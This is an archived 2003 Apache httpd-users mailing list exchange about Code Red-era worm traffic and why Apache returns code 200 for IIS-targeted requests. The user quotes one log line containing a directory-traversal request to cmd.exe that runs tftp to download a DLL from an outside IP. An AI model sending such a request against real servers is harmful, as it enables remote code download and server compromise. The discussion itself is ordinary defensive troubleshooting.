httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Alfredo Gómez Grande <ago...@agsoftware.net>
Subject Re: [users@httpd] Code Red
Date Sun, 10 Aug 2003 17:23:52 GMT
Sorry for the HTML and to write directly to you. It was not my intention. I
send you a line of the log

213.37.92.45 - - [10/Aug/2003:02:13:39 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20213.37.92.45%20GE
T%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 -1 "" ""

My question is if I don't have such those directories why is it reported a
code 200 ?

Well, anyway, if you say it is safe, I stay more confident. Thanks a lot.

Regards,
Alfredo Gómez






----- Original Message ----- 
From: Robert Andersson
To: users@httpd.apache.org
Sent: Sunday, August 10, 2003 7:07 PM
Subject: Re: [users@httpd] Code Red


First:
1. Do not start a new topic by replying another; it mess up archives etc.
2. Do not use HTML; make use of Format->Plain Text in OE.

Alfredo Gómez Grande wrote:
> Could anybody tell me what does this virus try to do when accessing
> the port 80?

What CodeRed does (when successful), is to cause an buffer overflow and
execute malicious code on an IIS server.

> I realized that sometimes, in the logfile it returns a code 200 and I am
> worried of if something had been returned to the visitor.

It is hard to comment on those log lines, as you didn't provide them, but I
would imaging they were completely legitimate requests.

> It is said that these attacks doesn't affect Apache, but could somebody
> explain why?

Because they exploit bugs (buffer overflows, in this case) specific to IIS.
As Apache isn't IIS, it isn't affected by the exploits.

Regards,
Robert Andersson


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message